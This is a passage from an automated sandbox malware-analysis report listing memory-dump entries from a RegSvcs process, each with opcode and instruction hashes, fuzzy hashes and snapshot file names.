                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction ID: 583827d9ed3805788d315156ee3d52a0a108c231078c3f15a7514e430e210a1c
                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                            • Instruction Fuzzy Hash: 60818332A002169FDF19CF59C480AAEBBF6FF84311F188569D91A9B789D734EA05CB50
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                            • Instruction ID: 8a7d05b436fc123cb73b3596f0dd41a1888ef47ca8a0ce2ed8d91b030555c7a6
                                            • Opcode Fuzzy Hash: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                            • Instruction Fuzzy Hash: ED814F71A00609AFDB25CFA9C880AEEBBBAFF88354F144429E555E7250D730AE45DB60
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                            • Instruction ID: f0d4055ba5db48ffbc6920e7bef0e5244b29906a7576e96dba9ac5250b2bff7c
                                            • Opcode Fuzzy Hash: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                            • Instruction Fuzzy Hash: F571BCB580462ADBCB25CF59D8907BEBBB0FF59B10F14411EE942EB350E7349A00CBA0
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                            • Instruction ID: 1660d2863c4b8f7c83c77d97ae698783d75d3ba77e36ef31fcb616aca955f151
                                            • Opcode Fuzzy Hash: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                            • Instruction Fuzzy Hash: DC719171904309EFEB20CF99D940A9ABBF9FF98701F55465AE608EB25CC7318980CF54
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                            • Instruction ID: f50e81fae6aa52408ba7d0c0342b196139831a2161854e8e523bfc6231b048f7
                                            • Opcode Fuzzy Hash: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                            • Instruction Fuzzy Hash: EA71C1356042428FD311DF2CC480B2AF7E6FF84714F0485AAE899CB356EB34DA85CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction ID: f2bb27e97a0e5acb244eeea31e0b7f5eb8bc4d6a7fb48bcd7b0e92f86dfd39f8
                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                            • Instruction Fuzzy Hash: 63716D71A0060AEFDB10DFA9C984A9EBBF8FF98700F144969E905E7250DB74EA01CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                            • Instruction ID: 6d74be8f1b5b3483632c7ae80a4fb658b3d2c766ad5370a95802c48fe992af99
                                            • Opcode Fuzzy Hash: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                            • Instruction Fuzzy Hash: B371D132200701AFE7329F18C884F56BBA6EF50724F244A1CE755D76A1E775EA44CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                            • Instruction ID: 4a5ed0b8dd77c0c712b017d4da307efff3c5bfd02834ac460e609a40015f62e9
                                            • Opcode Fuzzy Hash: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                            • Instruction Fuzzy Hash: 8281AB72A083168FDB24CF9CD484BADB7B6BB89714F15412DDA04EB291D774DE81CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b2a4a39e078a364317ef1d10edfe34f85e91d12d86421dfeb6a0c2c501dc35e
                                            • Instruction ID: 9f96026846ec6160b8b0a562c6cbea8574a8c2a7def61a7a2e7fb01fe363229a
                                            • Opcode Fuzzy Hash: 4b2a4a39e078a364317ef1d10edfe34f85e91d12d86421dfeb6a0c2c501dc35e
                                            • Instruction Fuzzy Hash: 84711A71E00209BFEB15DF94CC81FEEBBB9FB44350F104669F625A6290D774AA05CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                            • Instruction ID: e877875796f580b02a04a342eb1e422fa72f3e2cab297557c028a4087bd3913d
                                            • Opcode Fuzzy Hash: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                            • Instruction Fuzzy Hash: 4451F17250674AAFD712DE68C844F5BB7E8EBC5B10F000929BA48DB194D770EE45C7A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bd9faae13694a19c98a0a5b90a2374e3a5f34181e846003ec851616058aeae7
                                            • Instruction ID: eb2bd640d4cb619a1bd3c2930d2a75c8e5d7d66097c40147e5d65779bdccdb0f
                                            • Opcode Fuzzy Hash: 6bd9faae13694a19c98a0a5b90a2374e3a5f34181e846003ec851616058aeae7
                                            • Instruction Fuzzy Hash: D9518E70A00B05DFD722DF5AC884A6BFBF8BF94B10F104A1ED29A976E1D770A545CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: db2c8bc5d3da18102e4ee371501b28f373de87b41423a50083452456f933da07
                                            • Instruction ID: e506d2d4cad08ff83b9c61928250e12a7c0933d1d541460cd8bc285165390fcb
                                            • Opcode Fuzzy Hash: db2c8bc5d3da18102e4ee371501b28f373de87b41423a50083452456f933da07
                                            • Instruction Fuzzy Hash: 1D519B31600A05DFDB22EF69C9C0E6AB7F9FF54744F440429E916D7660E734EA40DB52
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fededa8f8f4e7bc1ea42e44447886912f29c21b497fa9e15159884e0b9dc4d78
                                            • Instruction ID: d679b3d5ba4e4b531e76561eff196ec4729e6707f08612c411e8d0b46559ad80
                                            • Opcode Fuzzy Hash: fededa8f8f4e7bc1ea42e44447886912f29c21b497fa9e15159884e0b9dc4d78
                                            • Instruction Fuzzy Hash: 3D5158716083029FD755DF29C980A6BB7E9BFC8704F44492DF689C7290E730EA05CB92
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction ID: 3e8062174aac79928a26bd30dbab9ea7ac492e56bb46fac41ed75de862e0854f
                                            • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                            • Instruction Fuzzy Hash: F9516D72E0421EABDF15FF98C440BEEBBB5AF45754F04406AEA01EB240D734DA44CBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction ID: 6eedebf00f0cd5c9e4f4d9a00323027bfe8635c109a65d822a1c4110608ff140
                                            • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                            • Instruction Fuzzy Hash: 5351B831D0021EEFEF219E98C888BAEBBF9AB46314F154665D511F7190E7709F4487A1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 680bfcc4c4358bf60be6e9a67a3fd42f54705b302f2dc63632d1285dc6f85c26
                                            • Instruction ID: 08593a5137d54680a91563c4b94669f52f5bfffa9709f4f214ac2111e7656ca1
                                            • Opcode Fuzzy Hash: 680bfcc4c4358bf60be6e9a67a3fd42f54705b302f2dc63632d1285dc6f85c26
                                            • Instruction Fuzzy Hash: 7D41D371B016219BD729DB2DC894F7BBBDEEF90221F088619F95D87289DB34D801C791
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4026fd332f266242291dcc8ee61aefd5d06fbae5146131f9dedb8f6241974e98
                                            • Instruction ID: 1e70724b44c9019d400d383c6f0818a738d0b6a3d176f6ffbacc991af1c56a7a
                                            • Opcode Fuzzy Hash: 4026fd332f266242291dcc8ee61aefd5d06fbae5146131f9dedb8f6241974e98
                                            • Instruction Fuzzy Hash: 37518A72E0021ADFCB20DFADC9849AEBBF9FB4A358B504519E505E3304D732AA01CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7745f0fc2a4683abed03cf240734ad589683668fe7d937d84bebe2366d900307
                                            • Instruction ID: 5a8f4a5e6ec4ffdefa7fbb7555d4cb64532c31466b06578a2e2b61d18f2fac4c
                                            • Opcode Fuzzy Hash: 7745f0fc2a4683abed03cf240734ad589683668fe7d937d84bebe2366d900307
                                            • Instruction Fuzzy Hash: CF410671748306DBEF29EFACA8C0B6A3765EB54758F48002CFD0AEB245E7719A00C752
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction ID: cdaca04ca5e85cff1ecda01980e393025bd25a7610460ff2e076455c29d71018
                                            • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                            • Instruction Fuzzy Hash: 1D41FD336007269FD715CF58C984A6AB7AAFF80315B05452EE95A87A44EB30ED08C7D1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ee87acd227f97cc90b50ea10d652b4819116fa7e87c73b6c02cc4f79403860
                                            • Instruction ID: 45220315cb135de9cf352c5ed4f03d1707bebe2ed3f69302f7086f39d66b42d0
                                            • Opcode Fuzzy Hash: 27ee87acd227f97cc90b50ea10d652b4819116fa7e87c73b6c02cc4f79403860
                                            • Instruction Fuzzy Hash: 8F41AF359002199BDF15DF98C440AEEB7B8BF48714F18815AF819F7240D7359E41CBA5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df63df2c3cf53987ca311321d83e4213f00246f24fe2e7cb2855d4e0295466a9
                                            • Instruction ID: 355604ff796f78a58bd788065e93b4c33c08b2e5548054480a86a5a42f2fdfa6
                                            • Opcode Fuzzy Hash: df63df2c3cf53987ca311321d83e4213f00246f24fe2e7cb2855d4e0295466a9
                                            • Instruction Fuzzy Hash: E341B2716143069FE724EF2CC884A1BB7EAFF88318F14482DEA57C7611DB35EA448B52
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction ID: aef0eae84ac88eee7656292a4fa3c01a10abc12d371bc7856870c82808eb6e39
                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction Fuzzy Hash: F6516C75A00219CFCB19CF59C480AAEF7B6FF84724F2881A9D915E7351D770AE82CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06f36d6395a0c3c6f375f3166d5d128974c9f07c31624c2935bd2e64ede2c04c
                                            • Instruction ID: 0c691ad5a005d121e9a450e44e472b8f5c67ccc04fa09d144eec477c1534de11
                                            • Opcode Fuzzy Hash: 06f36d6395a0c3c6f375f3166d5d128974c9f07c31624c2935bd2e64ede2c04c
                                            • Instruction Fuzzy Hash: 8751D670900256DBDB25DB6CCC00BA8BBB9EF15318F2442A9E529E73D1E7349B81CF41
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4b81ff35c6943fc4745c88954137e07f8bcad01b7771f2fb0bda96661ce5b124
                                            • Instruction ID: 74cd7ec5d77bbbcaf32118951c2ff707e9823ff3aff7613f7699481119c55623
                                            • Opcode Fuzzy Hash: 4b81ff35c6943fc4745c88954137e07f8bcad01b7771f2fb0bda96661ce5b124
                                            • Instruction Fuzzy Hash: 33414A31A002299EDB31EF6CC980BEA77B9AF45740F4500A5E948EB241DB749F84CB96
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction ID: ea3be33a326cf82d1420aef8948746b25d2bf0828fa38524475aff391a22fc34
                                            • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                            • Instruction Fuzzy Hash: 30419575B10125ABDF15DF99CC84AAFBBFEAF84650F144069E908E7349D670DE01C760
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 632f541a676d07ef554b975deb783a3319a2f429a522b9747ef40a2f3eaede24
                                            • Instruction ID: 672db25ae1c1f0a3cd6893c71aab86e714db3f754a3203897b0cfdbda854203d
                                            • Opcode Fuzzy Hash: 632f541a676d07ef554b975deb783a3319a2f429a522b9747ef40a2f3eaede24
                                            • Instruction Fuzzy Hash: 3141D3716107059FE325CF28C890A22B7FAFF49318B144A6DE547C7A51E730FA45CB94
Memory Dump Source
• Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction ID: e236cd306dc9a6ac7577a11011be2c37eb3a2d74a3490239e9ce40830ac32165
• Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
• Instruction Fuzzy Hash: 13312831A00248AFDB21CB6CCC80B9BBFE9EF15754F0441A6F815D7352D674DA84CBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction ID: d2327ef13a563a7c11cdba7b5e4f1c6877ebfa28bd4af877abb2b6450565ff11
                                            • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                            • Instruction Fuzzy Hash: B121453664065A77DF159B998C00FBBFB75EF80B11F40801AFA59C76D1D634DA81C361
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9229d787f53d6bec34fe9a39bf08f5fd00a16ec20bce63f63dd5cd3611462bfd
                                            • Instruction ID: c2e439c17f325baaea75b87b9640df3a0f99fc825b80135fcc54aa952f2cba72
                                            • Opcode Fuzzy Hash: 9229d787f53d6bec34fe9a39bf08f5fd00a16ec20bce63f63dd5cd3611462bfd
                                            • Instruction Fuzzy Hash: 3D31B632A0152C9BEB31DF18CC81FEEBBB9EB15744F4101A1EA45E7290D6749F809F91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction ID: 8080d9f2bcbd3224d5d2377e1f0bd0b8d35a26b2b74a2c1dece5bc20b6c58cc9
                                            • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                            • Instruction Fuzzy Hash: E2217172A00609EBDF16CF58CA80A8EBBB5FF48714F148569EE15DB241D671EB06CB90
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c232732f882940979fd3d0f340e911a4c2520cebb430bf50888fb2e7fa1d7142
                                            • Instruction ID: 8d7b3f8e690e64964280b35df13d382cd63f397b279f6afda86fe091e91eaac6
                                            • Opcode Fuzzy Hash: c232732f882940979fd3d0f340e911a4c2520cebb430bf50888fb2e7fa1d7142
                                            • Instruction Fuzzy Hash: C721C3726047459FCB22DF58C980B6BB7E5FB88760F044529FD54DB641D730EE018BA2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction ID: eef04ad63bf6fcc71e8fc2dcaf0cec951055a6c452f35b420233876a50c6852c
                                            • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                            • Instruction Fuzzy Hash: 8E318A31600608EFD721CB68C884F6ABBF9EF85358F1045A9E952CB291E730EF42CB51
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df459e8ac5a235b1f99c7fa85a82ccd50aeb9cac429824db3825dbf76977bfc9
                                            • Instruction ID: 7398560fdb43cd02ad39ec5521089c84c38d3f9181645ae0e5b94a156b4243e6
                                            • Opcode Fuzzy Hash: df459e8ac5a235b1f99c7fa85a82ccd50aeb9cac429824db3825dbf76977bfc9
                                            • Instruction Fuzzy Hash: 8231AE75A00209DFCB14DF1CD8849AEBBB5FF88714B158459E809EB391E731EA40CB91
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ea2b9704f1fcb1b1f4af41ce562212d6f571ef81d4682b255a45a525629399b0
                                            • Instruction ID: 969e6103c791ee117ce7e2c5d91d1cf2bdaf65144bf8f6a0a0b88dbc4e3b8d28
                                            • Opcode Fuzzy Hash: ea2b9704f1fcb1b1f4af41ce562212d6f571ef81d4682b255a45a525629399b0
                                            • Instruction Fuzzy Hash: D021A071A002299BCF10DF59C881ABEB7F4FF49740B440069F941F7240D778AE41CBA1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 850bfc85356541fca84aee6ab39695ea1cf4e234954b668aeca48c07780ffeaf
                                            • Instruction ID: b1a5945a3d8457f0a8c640222e95a86c35ef463cc46b8a1d94aa972480df5ec9
                                            • Opcode Fuzzy Hash: 850bfc85356541fca84aee6ab39695ea1cf4e234954b668aeca48c07780ffeaf
                                            • Instruction Fuzzy Hash: 9A21EC71600605AFD715DB6CC844F2AB7E8FF49740F140069F904EB6A1D738EE40CB69
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b2b94a4818421a12345eb68bf31c979c0b1b3cc784115a90c264ffc7d875ea25
                                            • Instruction ID: d0a76ff168cbcad68d87f95cb91ab57cfb33d43524fe3627a1ad2e71a83e76f2
                                            • Opcode Fuzzy Hash: b2b94a4818421a12345eb68bf31c979c0b1b3cc784115a90c264ffc7d875ea25
                                            • Instruction Fuzzy Hash: 2721D072A043469BD712EF5DC848B5BBBECAF92740F080856BD80C7251D774CB08C6A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24ca023313db888d58b37f645655fcc6a04fb17e2af805a469a5ce85f0c1e6a4
                                            • Instruction ID: 618f74cda8550e70760c87c7c263f1b5077bdbad1766d8d112f36f93325be535
                                            • Opcode Fuzzy Hash: 24ca023313db888d58b37f645655fcc6a04fb17e2af805a469a5ce85f0c1e6a4
                                            • Instruction Fuzzy Hash: 5D210B317556899BE726676C8D04B243BD5AF41B74F180364FF20EB6D2EB7CCA41C242
                                            Memory Dump Source
